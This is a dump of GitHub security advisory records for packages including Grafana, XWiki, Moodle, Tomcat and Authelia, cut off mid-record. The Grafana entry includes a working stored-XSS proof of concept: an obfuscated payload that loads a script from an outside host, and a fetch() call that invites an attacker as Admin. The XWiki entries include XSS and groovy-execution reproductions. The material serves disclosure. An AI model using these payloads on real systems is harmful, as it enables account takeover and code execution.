[{'type': 'WEB', 'url': 'https://github.com/sfackler/rust-openssl/pull/1854'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0022.html'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-24T22:01:35Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-cp47-r258-q626
|
2023-03-02T23:36:22Z
|
2023-03-02T23:36:22Z
| null |
[]
|
Vega vulnerable to arbitrary code execution when clicking href links
|
Vega is vulnerable to arbitrary code execution when clicking href links. Versions 5.4.1 and 4.5.1 contain a patch.
|
[]
|
[{'package': {'ecosystem': 'npm', 'name': 'vega'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.4.1'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'vega'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.5.1'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/vega/vega/security/advisories/GHSA-cp47-r258-q626'}, {'type': 'WEB', 'url': 'https://github.com/vega/vega/pull/1892'}, {'type': 'WEB', 'url': 'https://github.com/vega/vega/commit/692327013eb4dd5adec0c47a620181af1b135e2a'}, {'type': 'PACKAGE', 'url': 'https://github.com/vega/vega'}, {'type': 'WEB', 'url': 'https://github.com/vega/vega/commits/v4.5.1'}, {'type': 'WEB', 'url': 'https://github.com/vega/vega/commits/v5.4.1'}]
|
{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T23:36:22Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-vj5p-fp42-774p
|
2023-03-28T17:55:38Z
|
2023-03-23T21:30:19Z
| null |
['CVE-2023-1402']
|
Moodle may display roles to users who don't have access to them
|
The course participation report required additional checks to prevent roles being displayed which the user did not have access to view.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0'}, {'fixed': '4.1.2'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.0.7'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.11.0'}, {'fixed': '3.11.13'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.20'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1402'}, {'type': 'WEB', 'url': 'https://github.com/moodle/moodle/commit/f0a557bffbdb450648d0e4cedb391d14d8a0a253'}, {'type': 'WEB', 'url': 'https://git.moodle.org/gw?p=moodle.git;a=commitdiff;h=f0a557bffbdb450648d0e4cedb391d14d8a0a253'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/[email protected]/message/3QZN34VSF4HTCW3C3ZP2OZYSLYUKADPF/'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=445069'}]
|
{'cwe_ids': ['CWE-200', 'CWE-668'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T23:11:14Z', 'nvd_published_at': '2023-03-23T21:15:00Z'}
|
1.4.0
|
GHSA-36f2-fcrx-fp4j
|
2023-03-16T16:04:56Z
|
2023-03-16T16:04:56Z
| null |
['CVE-2021-29456']
|
Authelia allows open redirects on the logout endpoint
|
### Impact
Utilizing a HTTP query parameter an attacker is able to redirect users from the web application to any domain. The URL of the intended redirect should always be checked for safety prior to forwarding the user. Other endpoints of the web application already do this, they check both that the domain is using the HTTPS protocol and that it exists on a domain associated with the application.
An attacker is able to use this unintended functionality to redirect users to malicious sites. This particular security issue allows the attacker to make a phishing attempt seem much more trustworthy to a user of the web application as the initial site before redirection is familiar to them, as well as the actual URL which they have theoretically visited frequently.
While this security issue does not directly impact the security of the web application, it is still not an acceptable scenario for the reasons mentioned above.
### Patches
f0cb75e1e102f95f91e9254c66c797e821857690 fix(handlers): logout redirection validation (#1908) [v4.28.0](https://github.com/authelia/authelia/releases/tag/v4.28.0)
### Workarounds
Using a reverse proxy to strip the query parameter from the affected endpoint.
### References
https://github.com/authelia/authelia/pull/1908
[CWE-601](https://cwe.mitre.org/data/definitions/601.html)
[Authelia v4.28.0](https://github.com/authelia/authelia/tree/v4.28.0)
### For more information
If you have any questions or comments about this advisory, please [contact us](https://github.com/authelia/authelia#contact-options). You may also contact us to request creating a back-ported fix for this if you are able to explain why you cannot upgrade; however upgrading is highly preferable.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/authelia/authelia/v4'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.28.0'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/authelia/authelia/security/advisories/GHSA-36f2-fcrx-fp4j'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29456'}, {'type': 'PACKAGE', 'url': 'https://github.com/authelia/authelia'}]
|
{'cwe_ids': ['CWE-601'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-16T16:04:56Z', 'nvd_published_at': '2021-04-21T19:15:00Z'}
|
1.4.0
|
GHSA-2c9m-w27f-53rm
|
2023-03-27T22:10:53Z
|
2023-03-22T12:30:16Z
| null |
['CVE-2023-28708']
|
Apache Tomcat vulnerable to Unprotected Transport of Credentials
|
When using the RemoteIpFilter with requests received from a reverse proxy via HTTP that include the X-Forwarded-Proto header set to https, session cookies created by Apache Tomcat 11.0.0-M1 to 11.0.0.-M2, 10.1.0-M1 to 10.1.5, 9.0.0-M1 to 9.0.71 and 8.5.0 to 8.5.85 did not include the secure attribute. This could result in the user agent transmitting the session cookie over an insecure channel.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat-catalina'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '11.0.0-M1'}, {'fixed': '11.0.0-M3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat-catalina'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '10.1.0-M1'}, {'fixed': '10.1.6'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat-catalina'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0-M1'}, {'fixed': '9.0.72'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.apache.tomcat:tomcat-catalina'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.5.0'}, {'fixed': '8.5.86'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-28708'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/3b51230764da595bb19e8d0962dd8c69ab40dfab'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/5b72c94e8b2c4ada63a1d91dc527bf4d8fd1f510'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/c64d496dda1560b5df113be55fbfaefec349b50f'}, {'type': 'WEB', 'url': 'https://github.com/apache/tomcat/commit/f509bbf31fc00abe3d9f25ebfabca5e05173da5b'}, {'type': 'WEB', 'url': 'https://bz.apache.org/bugzilla/show_bug.cgi?id=66471'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/tomcat'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread/hdksc59z3s7tm39x0pp33mtwdrt8qr67'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-10.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-11.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-8.html'}, {'type': 'WEB', 'url': 'https://tomcat.apache.org/security-9.html'}]
|
{'cwe_ids': ['CWE-523'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-22T21:22:52Z', 'nvd_published_at': '2023-03-22T11:15:00Z'}
|
1.4.0
|
GHSA-h85v-cx5m-78wj
|
2023-03-13T15:35:01Z
|
2023-03-07T09:30:29Z
| null |
['CVE-2023-1244']
|
Answer vulnerable to Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1244'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/9870ed87fb24ed468aaf1e169c2d028e0f375106'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/bcab9555-8a35-42b2-a7de-0a79fd710b52'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:02:42Z', 'nvd_published_at': '2023-03-07T08:15:00Z'}
|
1.4.0
|
GHSA-32fq-m2q5-h83g
|
2023-03-03T22:53:51Z
|
2023-03-03T22:53:51Z
| null |
['CVE-2023-26480']
|
XWiki-Platform vulnerable to stored Cross-site Scripting via the HTML displayer in Live Data
|
### Impact
A user without script rights can introduce a stored XSS by using the Live Data macro.
For instance:
```
{{liveData id="movies" properties="title,description"}}
{
"data": {
"count": 1,
"entries": [
{
"title": "Meet John Doe",
"url": "https://www.imdb.com/title/tt0033891/",
"description": "<img onerror='alert(1)' src='foo' />"
}
]
},
"meta": {
"propertyDescriptors": [
{
"id": "title",
"name": "Title",
"visible": true,
"displayer": {"id": "link", "propertyHref": "url"}
},
{
"id": "description",
"name": "Description",
"visible": true,
"displayer": "html"
}
]
}
}
{{/liveData}}
```
### Patches
This has been patched in XWiki 14.9, 14.4.7, and 13.10.10.
### Workarounds
No known workaround.
### References
https://jira.xwiki.org/browse/XWIKI-20143
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira](http://jira.xwiki.org/)
* Email us at [Security ML](mailto:[email protected])
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:L'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livedata-macro'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.10'}, {'fixed': '13.10.10'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livedata-macro'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livedata-macro'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.9'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-32fq-m2q5-h83g'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26480'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/23d5ea9b23e84b5f3d1f1b2d5673fe8c774d0d79'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/556e7823260b826f344c1a6e95d935774587e028'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20143'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-03-03T22:53:51Z', 'nvd_published_at': '2023-03-02T18:15:00Z'}
|
1.4.0
|
GHSA-h6f5-8jj5-cxhr
|
2023-03-13T19:17:37Z
|
2023-03-02T15:16:43Z
| null |
['CVE-2023-26475']
|
xwiki-platform vulnerable to Remote Code Execution in Annotations
|
### Impact
The annotation displayer does not execute the content in a restricted context. This allows executing anything with the right of the author of any document by annotating the document.
To reproduce: add an annotation with the content `{{groovy}}print "hello"{{/groovy}}` and click the yellow scare to get a display of the annotation inline.
The result is "hello" but it should be an error suggesting that it's not allowed to use the groovy macro.
### Patches
This has been patched in XWiki 13.10.11, 14.4.7 and 14.10.
### Workarounds
There is no easy workaround except to upgrade.
### References
https://jira.xwiki.org/browse/XWIKI-20360
https://jira.xwiki.org/browse/XWIKI-20384
### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])
### Attribution
This vulnerability has been reported by René de Sain @renniepak.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-annotation-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3-milestone-1'}, {'fixed': '13.10.11'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-annotation-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.0-rc-1'}, {'fixed': '14.4.7'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-annotation-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-h6f5-8jj5-cxhr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26475'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/d87d7bfd8db18c20d3264f98c6deefeae93b99f7'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20360'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20384'}]
|
{'cwe_ids': ['CWE-269', 'CWE-270'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T15:16:43Z', 'nvd_published_at': '2023-03-02T19:15:00Z'}
|
1.4.0
|
GHSA-qrrg-gw7w-vp76
|
2023-03-23T20:10:47Z
|
2023-03-23T20:10:47Z
| null |
['CVE-2023-1410']
|
Grafana Stored Cross-site Scripting in Graphite FunctionDescription tooltip
|
### Summary
When a Graphite data source is added, one can use this data source in a dashboard. This contains a feature to use `Functions`. Once a function is selected, a small tooltip will be shown when hovering over the name of the function. This tooltip will allow you to delete the selected Function from your query or show the Function Description. However, no sanitization is done when adding this description to the DOM. Since it is not uncommon to connect to public data sources, and attacker could host a Graphite instance with modified Function Descriptions containing XSS payloads. When the victim uses it in a query and accidentally hovers over the Function Description, an attacker controlled XSS payload will be executed. This can be used to add the attacker as an Admin for example.
### Details
1. Spin up your own Graphite instance. I've done this using the `make devenv sources=graphite`.
2. Now start a terminal for your Graphite container and modify the following file `/opt/graphite/webapp/graphite/render/functions.py`
3. Basically you can pick any function but I picked the `aggregateSeriesLists` function. Modify its description to be `"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>`
The result would look like this:
```python
def aggregateSeriesLists(requestContext, seriesListFirstPos, seriesListSecondPos, func, xFilesFactor=None):
"""
"><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vY20yLnRlbCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>
"""
if len(seriesListFirstPos) != len(seriesListSecondPos):
raise InputParameterError(
"seriesListFirstPos and seriesListSecondPos argument must have equal length")
results = []
for i in range(0, len(seriesListFirstPos)):
firstSeries = seriesListFirstPos[i]
secondSeries = seriesListSecondPos[i]
aggregated = aggregate(requestContext, (firstSeries, secondSeries), func, xFilesFactor=xFilesFactor)
if not aggregated: # empty list, no data found
continue
result = aggregated[0] # aggregate() can only return len 1 list
result.name = result.name[:result.name.find('Series(')] + 'Series(%s,%s)' % (firstSeries.name, secondSeries.name)
results.append(result)
return results
aggregateSeriesLists.group = 'Combine'
aggregateSeriesLists.params = [
Param('seriesListFirstPos', ParamTypes.seriesList, required=True),
Param('seriesListSecondPos', ParamTypes.seriesList, required=True),
Param('func', ParamTypes.aggFunc, required=True),
Param('xFilesFactor', ParamTypes.float),
]
```
4. Save and quit the file. Restart your Graphite Container (I did this using the Restart Icon in Docker Desktop)
5. Now login to your Grafana instance as an Organisation Admin.
6. Navigate to http://[grafana]/plugins/graphite and click `Create a Graphite data source`
7. Add the url to the attackers Graphite instance (maybe enable `Skip TLS Verify`) and click `Save & test` and `Explore`
8. In the newly opened page click the + icon next to `Functions` and search for `aggregateSeriesLists` and click it to add it.
9. Now hover over `aggregateSeriesLists` with your mouse and move your mouse to the `?` icon.
### Result
Our payload will trigger and in this case it will include an external script to trigger the alerts.
#### Decoded payload
```javascript
var a=document.createElement("script");a.src="https://cm2.tel";document.body.appendChild(a);
```

### Impact
In the POC we've picked 1 function to have a XSS payload, but a real attacker would of course maximize the likelihood by replacing all of it's descriptions with XSS payloads. As shown above the attacker can now run arbitrary javascript in the browser of the victim. The victim can be any user using the malicious Graphite instance in a query (or while Exploring), including the Organisation Admin. If so, an attacker could include a payload to add them as an admin themselves.
An example would be something like this:
```javascript
fetch("/api/org/invites", {
"headers": {
"content-type": "application/json"
},
"body": "{\"name\":\"\",\"email\":\"\",\"role\":\"Admin\",\"sendEmail\":true,\"loginOrEmail\":\"[email protected]\"}",
"method": "POST",
"credentials": "include"
});
```
### Mitigation
The vulnerability seems to occur in the following file: public\app\plugins\datasource\graphite\components\FunctionEditorControls.tsx
```typescript
const FunctionDescription = React.lazy(async () => {
// @ts-ignore
const { default: rst2html } = await import(/* webpackChunkName: "rst2html" */ 'rst2html');
return {
default(props: { description?: string }) {
return <div dangerouslySetInnerHTML={{ __html: rst2html(props.description ?? '') }} />;
},
};
});
```
In many other similar cases, some form of sanitization is used. I would advise to use the same here as rst2html itself will just leave HTML untouched when parsing the expected reStructuredText from Graphite. So now when it is applied using dangerouslySetInnerHTML our XSS payload will survive.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '8.0.0'}, {'fixed': '8.5.22'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.3.0'}, {'fixed': '9.3.11'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.4.0'}, {'fixed': '9.4.7'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/grafana/grafana'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '9.0.0'}, {'fixed': '9.2.15'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/grafana/bugbounty/security/advisories/GHSA-qrrg-gw7w-vp76'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1410'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/42911348a76e8484396b951bef8b7bff97a84cbc'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/e59427c0747ae2f3feb1bfc3a4b87f0886208cc6'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/ef2eb2b6bf1d7c0fb781e3e05d0d1aecd6dd438a'}, {'type': 'WEB', 'url': 'https://github.com/grafana/grafana/commit/f9548d33f8624d6694983fe5aad181007405be8a'}, {'type': 'PACKAGE', 'url': 'https://github.com/grafana/grafana'}, {'type': 'WEB', 'url': 'https://grafana.com/security/security-advisories/cve-2023-1410/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-23T20:10:47Z', 'nvd_published_at': None}
|
1.4.0
|
GHSA-qrwm-xqfr-4vhv
|
2023-03-13T15:32:57Z
|
2023-03-07T09:30:30Z
| null |
['CVE-2023-1242']
|
Answer vulnerable to Cross-site Scripting
|
Cross-site Scripting (XSS) - Stored in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1242'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/90bfa0dcc7b49482f1d1e31aee3ab073f3c13dd9'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/71c24c5e-ceb2-45cf-bda7-fa195d37e289'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-08T17:03:10Z', 'nvd_published_at': '2023-03-07T08:15:00Z'}
|
1.4.0
|
GHSA-2qqx-w9hr-q5gx
|
2023-04-03T13:07:46Z
|
2023-03-30T06:30:26Z
| null |
['CVE-2023-26117']
|
angular vulnerable to regular expression denial of service via the $resource service
|
All versions of the package angular are vulnerable to Regular Expression Denial of Service (ReDoS) via the $resource service due to the usage of an insecure regular expression. Exploiting this vulnerability is possible by a large carefully-crafted input, which can result in catastrophic backtracking.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]
|
[{'package': {'ecosystem': 'npm', 'name': 'angular'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.3'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-26117'}, {'type': 'PACKAGE', 'url': 'https://github.com/angular/angular.js'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-5406323'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBANGULAR-5406325'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-5406324'}, {'type': 'WEB', 'url': 'https://security.snyk.io/vuln/SNYK-JS-ANGULAR-3373045'}, {'type': 'WEB', 'url': 'https://stackblitz.com/edit/angularjs-vulnerability-resource-trailing-slashes-redos'}]
|
{'cwe_ids': ['CWE-1333'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-04-03T13:07:46Z', 'nvd_published_at': '2023-03-30T05:15:00Z'}
|
1.4.0
|
GHSA-42x8-2v53-pqmj
|
2023-03-23T22:36:14Z
|
2023-03-20T17:18:25Z
| null |
['CVE-2023-1517']
|
Pimcore has Cross site Scripting vulnerability in Schedule tab of Documents
|
### Impact
This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie or redirect users to other malicious sites.
### Patches
Update to version 10.5.19 or apply this patch manually https://github.com/pimcore/pimcore/pull/14631.patch
### Workarounds
Apply https://github.com/pimcore/pimcore/pull/14631.patch manually.
### References
https://huntr.dev/bounties/82adf0dd-8ebd-4d15-9f91-6060c8fa5a0d/
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N'}]
|
[{'package': {'ecosystem': 'Packagist', 'name': 'pimcore/pimcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '10.5.19'}]}]}]
|
[{'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/security/advisories/GHSA-42x8-2v53-pqmj'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1517'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14631'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/pull/14631.patch'}, {'type': 'WEB', 'url': 'https://github.com/pimcore/pimcore/commit/3a22700dacd8a439cffcb208838a4199e732cff7'}, {'type': 'PACKAGE', 'url': 'https://github.com/pimcore/pimcore'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/82adf0dd-8ebd-4d15-9f91-6060c8fa5a0d'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/82adf0dd-8ebd-4d15-9f91-6060c8fa5a0d/'}]
|
{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-20T17:18:25Z', 'nvd_published_at': '2023-03-20T16:15:00Z'}
|
1.4.0
|
GHSA-rvjp-8qj4-8p29
|
2023-03-23T16:30:08Z
|
2023-03-21T06:30:17Z
| null |
['CVE-2023-1538']
|
Answer has Observable Timing Discrepancy
|
Observable Timing Discrepancy in GitHub repository answerdev/answer prior to 1.0.6.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]
|
[{'package': {'ecosystem': 'Go', 'name': 'github.com/answerdev/answer'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-1538'}, {'type': 'WEB', 'url': 'https://github.com/answerdev/answer/commit/813ad0b9894673b1bdd489a2e9ab60a44fe990af'}, {'type': 'PACKAGE', 'url': 'https://github.com/answerdev/answer'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/ac0271eb-660f-4966-8b57-4bc660a9a1a0'}]
|
{'cwe_ids': ['CWE-203', 'CWE-208'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-21T22:32:24Z', 'nvd_published_at': '2023-03-21T05:15:00Z'}
|
1.4.0
|
GHSA-jxr6-7qg5-8wv6
|
2023-03-30T01:01:45Z
|
2023-03-22T21:30:17Z
| null |
['CVE-2023-0870']
|
OpenNMS Meridian and Horizon vulnerable to Cross-Site Request Forgery
|
A form can be manipulated with cross-site request forgery in multiple versions of OpenNMS Meridian and Horizon. This can potentially allow an attacker to gain access to confidential information and compromise integrity. The solution is to upgrade to Meridian 2023.1.1 or Horizon 31.0.6 or newer. Meridian and Horizon installation instructions state that they are intended for installation within an organization's private networks and should not be directly accessible from the Internet.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]
|
[{'package': {'ecosystem': 'Maven', 'name': 'org.opennms:opennms-webapp'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '31.0.6'}]}]}]
|
[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0870'}, {'type': 'WEB', 'url': 'https://github.com/OpenNMS/opennms/pull/5835/files'}, {'type': 'WEB', 'url': 'https://docs.opennms.com/meridian/2023/releasenotes/changelog.html#releasenotes-changelog-Meridian-2023.1.1'}, {'type': 'PACKAGE', 'url': 'https://github.com/OpenNMS/opennms'}]
|
{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-22T22:21:57Z', 'nvd_published_at': '2023-03-22T19:15:00Z'}
|
1.4.0
|
GHSA-qc86-vgf2-6fq6
|
2023-03-13T15:35:41Z
|
2023-03-06T21:30:18Z
| null |
['CVE-2021-36392']
|
Moodle SQL Injection vulnerability
|
In Moodle, an SQL injection risk was identified in the library fetching a user's enrolled courses.
|
[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]
|
